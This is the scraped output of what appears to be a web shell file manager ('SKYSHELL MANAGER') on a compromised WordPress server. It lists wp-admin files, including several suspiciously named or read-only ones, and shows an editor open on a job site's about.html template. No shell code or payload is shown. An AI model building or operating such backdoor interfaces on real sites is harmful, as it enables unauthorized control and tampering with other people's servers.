📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: about.html
<!DOCTYPE html> <html> <head> <!-- Basic --> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /> <!-- Site Metas --> <meta name="keywords" content="" /> <meta name="description" content="" /> <meta name="author" content="" /> <title>TimingCreation</title> <!-- bootstrap core css --> <link rel="stylesheet" type="text/css" href="css/bootstrap.css" /> <link href="https://fonts.googleapis.com/css?family=Poppins:400,700&display=swap" rel="stylesheet"> <!-- Custom styles for this template --> <link href="css/style.css" rel="stylesheet" /> <!-- responsive style --> <link href="css/responsive.css" rel="stylesheet" /> </head> <body class="sub_page"> <div class="hero_area"> <!-- header section strats --> <header class="header_section"> <div class="container-fluid"> <nav class="navbar navbar-expand-lg custom_nav-container"> <a class="navbar-brand" href="index.html"> <img src="images/logo.png" alt="" /> <span> TimingCreation </span> </a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav "> <li class="nav-item"> <a class="nav-link" href="index.html">Home <span class="sr-only">(current)</span></a> </li> <li class="nav-item active"> <a class="nav-link" href="about.html"> About</a> </li> <li class="nav-item"> <a class="nav-link" href="work.html">Work </a> </li> <li class="nav-item"> <a class="nav-link" href="category.html"> Category </a> </li> </ul> <div class="user_option"> <a href=""> <span> Login </span> </a> <form class="form-inline my-2 my-lg-0 ml-0 ml-lg-4 mb-3 mb-lg-0"> <button class="btn my-2 my-sm-0 nav_search-btn" type="submit"></button> </form> </div> </div> <div> <div class="custom_menu-btn "> <button> <span class=" s-1"> </span> <span class="s-2"> </span> <span class="s-3"> </span> </button> </div> </div> </nav> </div> </header> <!-- end header section --> </div> <!-- experience section --> <section class="experience_section layout_padding"> <div class="container"> <div class="row"> <div class="col-md-5"> <div class="img-box"> <img src="images/experience-img.jpg" alt=""> </div> </div> <div class="col-md-7"> <div class="detail-box"> <h2> Higher Quality Listings </h2> <p> Only legit jobs. No ads, scams, or junk to sift through. Our team spends 200+ hours/day verifying every job and writing company descriptions, so you'll know who's hiring. </p> <h2>Personalized Tools</h2> <p>Save and apply to jobs, track with activity logs and checklists. Get alerts for new jobs of interest.</p> <h2>Save Time</h2> <p>Go straight from job listings to applications. No more hopping from one job board to the next.</p> <h2>Improve Your Overall Job Search</h2> <p>We can help whether you’re a stay-at-home mom or dad, digital nomad, seeking full-time work or part-time side job, changing or starting a career, or looking for $25/hour or $100k/year.</p> </div> </div> </div> </div> </section> <!-- end experience section --> <!-- about section --> <section class="about_section layout_padding"> <div class="container"> <div class="row"> <div class="col-md-10 col-lg-9 mx-auto"> <div class="img-box"> <img src="images/about-img.jpg" alt=""> </div> </div> </div> <div class="detail-box"> <h2> Your Trusted Remote Job Site </h2> <p> That’s when the idea for TimingCreation came: A site where job seekers could find professional-level, legitimate work-from-home jobs. Over 5 years later, TimingCreation has grown into a leading job site helping people find great remote jobs. </p> </div> </div> </section> <!-- end about section --> <!-- info section --> <section class="info_section "> <div class="info_container layout_padding-top"> <div class="container"> <div class="info_top"> <div class="info_logo"> <img src="images/logo.png" alt="" /> <span> TimingCreation </span> </div> </div> <div class="info_main"> <div class="row"> <div class="col-md-3 col-lg-2"> <div class="info_link-box"> <h5> Useful Link </h5> <ul> <li class=" active"> <a class="" href="index.html">Home <span class="sr-only">(current)</span></a> </li> <li class=""> <a class="" href="about.html">About </a> </li> <li class=""> <a class="" href="work.html">Work </a> </li> <li class=""> <a class="" href="category.html">Category </a> </li> </ul> </div> </div> <div class="col-md-3 "> <h5> who we are </h5> <p> That’s when the idea for TimingCreation came: A site where job seekers could find professional-level, legitimate work-from-home jobs. Over 5 years later, TimingCreation has grown into a leading job site helping people find great remote jobs. </p> </div> <div class="col-md-3 offset-lg-1"> <div class="info_form "> <h5> Newsletter </h5> <form action="#0"> <input type="email" placeholder="Email"> <button> Subscribe </button> </form> </div> </div> </div> </div> <div class="row"> <div class="col-lg-9 col-md-10 mx-auto"> <div class="info_contact layout_padding2"> <div class="row"> <div class="col-md-3"> <a href="#" class="link-box"> <div class="img-box"> <img src="images/location.png" alt=""> </div> <div class="detail-box"> <h6> 1866 Sunrise Road Las Vegas, NV 89119 US. </h6> </div> </a> </div> <div class="col-md-4"> <a href="#" class="link-box"> <div class="img-box"> <img src="images/mail.png" alt=""> </div> <div class="detail-box"> <h6> contact@timingcreation.com </h6> </div> </a> </div> <div class="col-md-5"> <a href="#" class="link-box"> <div class="img-box"> <img src="images/call.png" alt=""> </div> <div class="detail-box"> <h6> Call +1 7028 859 798 </h6> </div> </a> </div> </div> </div> </div> </div> </div> </div> </section> <!-- end info section --> <!-- footer section --> <footer class="container-fluid footer_section "> <div class="container"> <p> © <span id="displayDate"></span> All Rights Reserved TimingCreation. </p> </div> </footer> <!-- end footer section --> <script src="js/jquery-3.4.1.min.js"></script> <script src="js/bootstrap.js"></script> <script src="js/custom.js"></script> </body> </body> </html>
Save